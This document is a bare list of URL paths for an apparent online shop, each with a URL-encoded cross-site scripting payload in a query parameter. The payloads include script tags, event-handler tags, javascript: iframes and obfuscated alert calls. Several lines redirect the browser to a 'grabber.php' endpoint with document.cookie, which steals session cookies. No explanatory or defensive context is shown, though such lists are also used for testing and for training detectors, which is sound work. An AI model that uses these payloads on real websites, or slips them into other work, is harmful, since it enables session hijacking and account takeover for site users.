/wishlist?query=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/products?password123=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/search?username1=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/search?action1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/products?electronics=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/checkout?banana=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?value1=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/search?value1=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/order?password123=%3Csvg%20onload%3Dalert%281%29%3E
/checkout?category1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?laptop=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/order?laptop=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?electronics=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/wishlist?search_term=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/cart?username1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?search_term=%3Cscript%3Eeval%28%27%5Cx61lert%28%5C%2733%5C%27%29%27%29%3C/script%3E
/search?query=%3Cbody%20onload%3Dalert%28%27XSS%27%29%3E
/cart?electronics=%3Cscript%3Edocument.location%3D%27http%3A//localhost/XSS/grabber.php%3Fc%3D%27%2Bdocument.cookie%3C/script%3E
/checkout?query=Function%28%22ale%22%2B%22rt%281%29%22%29%28%29%3B
/api?laptop=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?phone=%3Ciframe%20src%3D%27javascript%3Aalert%281%29%27%3E
/products?query=setTimeout%28%27ale%27%2B%27rt%282%29%27%29%3B
/api?phone=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
/cart?laptop=%3Csvg%20onload%3Dalert%281%29%3E
/cart?query=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/order?shoes=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/cart?book=%3Csvg%20onload%3Dalert%281%29%3E
/wishlist?search_term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/order?password123=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
/products?apple=%3Cdiv%20onpointerover%3D%22alert%2845%29%22%3EMOVE%20HERE%3C/div%3E
